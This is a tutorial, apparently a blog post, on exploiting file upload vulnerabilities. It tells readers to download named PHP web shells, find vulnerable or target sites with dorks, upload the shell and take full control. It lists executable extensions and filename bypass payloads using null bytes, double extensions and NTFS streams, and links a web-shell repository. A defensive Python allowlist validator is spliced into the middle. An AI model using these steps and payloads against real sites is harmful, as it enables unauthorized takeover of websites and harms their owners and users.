What is a file upload vulnerability / shell upload? File upload vulnerability process



What is a file upload vulnerability / shell upload?

A file upload vulnerability (shell upload) exists when a web server lets users upload files to its file system without sufficiently validating their name, type, contents, or size.

If restrictions on this file upload are not enforced correctly, anyone can use the website's file-upload vulnerability to tamper with the upload request, place any kind of file on the website, and, by means of server-side script files, gain remote access to the website.



File Upload Vulnerability Process:


Step-1: Download my shell

Name        Language   File
Alfa-Shell  php        Download
gel4y       php        Download
wso         php        Download
 
Step-2: Search for a vulnerable website or your target website. To search for vulnerable websites you can use ChatGPT or Google dorks.

Step-3: Find the file upload option on your target or vulnerable website. Any file upload option will do for uploading the shell.
Image demo:

Step-4: Now upload the shell here and open the uploaded directory.
Example:
If you upload to a website such as https://example.com and your file name is shell.php, then your directory is https://example.com/shell.php. That is how you find your directory.

Step-5: Open your directory and you will see the shell. Now you can fully control your target website from here 😊


If the file cannot be uploaded, follow the instructions given below:

1. File Upload Bypass:
File Upload General Methodology:
Other useful extensions:
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
Coldfusion: .cfm, .cfml, .cfc, .dbm
Flash: .swf
Perl: .pl, .cgi
Erlang Yaws Web Server: .yaws


2. Bypass file extension checks:

1) If they apply, check the previous extensions. Also test them using some uppercase letters: pHp, .pHP5, .PhAr, ...
2) Check adding a valid extension before the executable extension (use the previous extensions as well):


file.png.php
file.png.Php5

3) Try adding special characters at the end. You could use Burp to brute-force all ASCII and Unicode characters. (Note that you can also combine this with the previously mentioned extensions.)


file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5...

4) Try to bypass the protections by tricking the server-side extension parser with techniques such as doubling the extension or adding junk data (null bytes) between extensions. You can also use the previous extensions to prepare a better payload.


file.png.php
file.png.pHp5
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png


5) Add another layer of extensions to the previous check:


file.png.jpg.php
file.php%00.png%00.jpg

6) Try to put the executable extension before the valid extension and hope the server is misconfigured. **(Useful against Apache misconfigurations where anything with the extension .php, but not necessarily ending in .php, will execute code.)**


ex: file.php.png

7) Using an NTFS alternate data stream (ADS) on Windows. In this case, a colon character ":" is inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension is created on the server (e.g. "file.asax:.jpg"). This file might be edited later using other techniques, such as its short filename. The "::$data" pattern can also be used to create non-empty files. Adding a dot character after this pattern might also help bypass further restrictions (e.g. "file.asp::$data.").
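For the defending side, here is an added example (written for this page, not code from the original post or from the linked repository) showing why every name-based trick listed in section 2 fails against a strict allowlist: one plain base name, exactly one dot, one short extension checked case-insensitively after percent-decoding, plus a server-chosen storage name so the uploader never controls the extension that is written. The image-upload context, the allowlist and the sample list are assumptions.

```python
import re
import secrets
import urllib.parse

# Extensions this hypothetical image-upload endpoint accepts (assumption).
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# One plain base name, exactly one dot, one short extension. A second extension,
# a trailing dot or space, '%', ':', '/', '\\' or any control byte cannot match.
_SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")

# Constructed samples, taken from the bypass list on this page.
PAGE_BYPASS_SAMPLES = (
    "file.png.php", "file.png.Php5", "file.php%20", "file.php%0a", "file.php%00",
    "file.php%0d%0a", "file.php/", "file.php.\\", "file.", "file.php....",
    "file.pHp5...", "file.php%00.png", "file.php\\x00.png", "file.phpJunk123png",
    "file.png.jpg.php", "file.php%00.png%00.jpg", "file.php.png",
    "file.asax:.jpg", "file.asp::$data.",
)


def validate_upload_name(raw_name):
    """Return (True, ext) for an acceptable name, else (False, reason).
    Percent-encoding is decoded first so 'file.php%00.png' is judged on the
    characters the filesystem would actually see."""
    name = urllib.parse.unquote(raw_name)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in name):
        return False, "control character or null byte in name"
    if any(sep in name for sep in ("/", "\\", ":")):
        return False, "path separator or NTFS stream marker in name"
    m = _SAFE_NAME.fullmatch(name)      # fullmatch: no '$'-before-newline loophole
    if not m:
        return False, "name is not <base>.<ext> with a plain base"
    ext = m.group(1).lower()            # case-fold so pHp5 / PhAr get no free pass
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension ." + ext + " not in allowlist"
    return True, ext


def stored_name(raw_name):
    """Server-chosen storage name: random base plus the validated extension,
    so the uploader controls neither the path nor the extension written."""
    ok, detail = validate_upload_name(raw_name)
    if not ok:
        raise ValueError(detail)
    return secrets.token_hex(16) + "." + detail


def rejected_samples():
    """Names from PAGE_BYPASS_SAMPLES that the validator turns away."""
    return [s for s in PAGE_BYPASS_SAMPLES if not validate_upload_name(s)[0]]
```

Pair the name check with a content check (magic bytes or a real image decode) and store uploads outside the web root or under a path the server will never execute, since the name check alone does not cover content-based tricks.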

3. Video demo:
GitHub: https://github.com/TheBwof/web-shell




Thank you so much for reading 😊


